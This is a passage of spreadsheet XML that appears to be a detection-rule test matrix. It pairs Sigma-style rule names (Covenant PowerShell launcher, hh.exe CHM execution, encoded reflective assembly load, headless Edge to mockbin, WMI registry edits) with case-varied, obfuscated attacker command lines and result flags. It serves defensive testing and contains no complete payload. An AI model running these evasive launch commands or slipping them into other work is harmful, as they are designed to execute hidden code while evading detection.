      <c r="D1041" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1041" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -nop /"W" H -st $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F1041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1041" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1041" s="43" t="n"/>
      <c r="J1041" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1041" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1042" ht="15.75" customHeight="1" s="42">
      <c r="A1042" s="43" t="n"/>
      <c r="B1042" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1042" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1042" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1042" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutiONpolIcY Bypass /"NoProfile" -W H /"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F1042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1042" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1042" s="43" t="n"/>
      <c r="J1042" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1042" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1043" ht="15.75" customHeight="1" s="42">
      <c r="A1043" s="43" t="n"/>
      <c r="B1043" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1043" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1043" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1043" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcUtiOnpOLIcy Bypass -nop -w H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F1043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1043" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1043" s="43" t="n"/>
      <c r="J1043" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1043" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1044" ht="15.75" customHeight="1" s="42">
      <c r="A1044" s="43" t="n"/>
      <c r="B1044" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1044" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1044" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1044" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -exEcuTioNPOLICy Bypass -nop -"W" H -St $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F1044" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1044" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1044" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1044" s="43" t="n"/>
      <c r="J1044" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1044" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1045" ht="15.75" customHeight="1" s="42">
      <c r="A1045" s="43" t="n"/>
      <c r="B1045" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1045" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1045" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1045" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EXECUTiOnpOliCy Bypass /"NoProfile" -"W" H -"St" $d = [System.Convert]::FromBase64String('cwB2ACAAbwAgA...'); [System.Text.Encoding]::Unicode.GetString($d) | iex</t>
        </is>
      </c>
      <c r="F1045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1045" s="43" t="n"/>
      <c r="J1045" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1045" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1046" ht="15.75" customHeight="1" s="42">
      <c r="A1046" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B1046" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1046" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1046" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1046" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F1046" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1046" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1046" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1046" s="43" t="n"/>
      <c r="J1046" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1046" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1047" ht="15.75" customHeight="1" s="42">
      <c r="A1047" s="43" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B1047" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1047" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1047" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1047" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F1047" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1047" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1047" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1047" s="43" t="n"/>
      <c r="J1047" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1047" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1048" ht="15.75" customHeight="1" s="42">
      <c r="A1048" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B1048" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1048" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1048" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1048" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F1048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1048" s="43" t="n"/>
      <c r="J1048" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1048" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1049" ht="15.75" customHeight="1" s="42">
      <c r="A1049" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B1049" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1049" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1049" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1049" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F1049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1049" s="43" t="n"/>
      <c r="J1049" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1049" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1050" ht="15.75" customHeight="1" s="42">
      <c r="A1050" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B1050" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C1050" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D1050" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E1050" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe "execmd" calc.exe</t>
        </is>
      </c>
      <c r="F1050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1050" s="43" t="n"/>
      <c r="J1050" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1050" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1051" ht="15.75" customHeight="1" s="42">
      <c r="A1051" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B1051" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C1051" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D1051" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E1051" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe exec show calc.exe</t>
        </is>
      </c>
      <c r="F1051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1051" s="43" t="n"/>
      <c r="J1051" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1051" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1052" ht="15.75" customHeight="1" s="42">
      <c r="A1052" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1052" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1052" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1052" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1052" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1052" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1052" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1052" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1052" s="43" t="n"/>
      <c r="J1052" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1052" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1053" ht="15.75" customHeight="1" s="42">
      <c r="A1053" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1053" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1053" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1053" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1053" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1053" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1053" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1053" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1053" s="43" t="n"/>
      <c r="J1053" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1053" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1054" ht="15.75" customHeight="1" s="42">
      <c r="A1054" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1054" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1054" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1054" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1054" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1054" s="43" t="n"/>
      <c r="J1054" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1054" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1055" ht="15.75" customHeight="1" s="42">
      <c r="A1055" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1055" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1055" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1055" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1055" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1055" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1055" s="43" t="n"/>
      <c r="J1055" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1055" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1056" ht="15.75" customHeight="1" s="42">
      <c r="A1056" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1056" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1056" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1056" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1056" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1056" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1056" s="43" t="n"/>
      <c r="J1056" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1056" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1057" ht="15.75" customHeight="1" s="42">
      <c r="A1057" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1057" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1057" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1057" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1057" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODEDCOmmAnD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1057" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1057" s="43" t="n"/>
      <c r="J1057" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1057" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1058" ht="15.75" customHeight="1" s="42">
      <c r="A1058" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1058" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1058" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1058" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1058" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1058" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1058" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1058" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1058" s="43" t="n"/>
      <c r="J1058" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1058" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1059" ht="15.75" customHeight="1" s="42">
      <c r="A1059" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1059" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1059" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1059" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1059" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1059" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1059" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1059" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1059" s="43" t="n"/>
      <c r="J1059" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1059" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1060" ht="15.75" customHeight="1" s="42">
      <c r="A1060" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B1060" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C1060" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D1060" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E1060" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F1060" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1060" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1060" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1060" s="43" t="n"/>
      <c r="J1060" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1060" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1061" ht="15.75" customHeight="1" s="42">
      <c r="A1061" s="43" t="n"/>
      <c r="B1061" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C1061" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D1061" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E1061" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --head^less=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F1061" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1061" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1061" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1061" s="43" t="n"/>
      <c r="J1061" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1061" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1062" ht="15.75" customHeight="1" s="42">
      <c r="A1062" s="43" t="n"/>
      <c r="B1062" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C1062" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D1062" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E1062" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://mock^bin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F1062" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1062" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1062" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1062" s="43" t="n"/>
      <c r="J1062" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1062" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1063" ht="15.75" customHeight="1" s="42">
      <c r="A1063" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1063" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1063" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1063" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1063" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1063" s="43" t="n"/>
      <c r="J1063" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1063" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1064" ht="15.75" customHeight="1" s="42">
      <c r="A1064" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1064" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1064" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1064" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1064" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1064" s="43" t="n"/>
      <c r="J1064" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1064" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1065" ht="15.75" customHeight="1" s="42">
      <c r="A1065" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1065" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1065" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1065" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1065" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1065" s="43" t="n"/>
      <c r="J1065" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1065" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1066" ht="15.75" customHeight="1" s="42">
      <c r="A1066" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
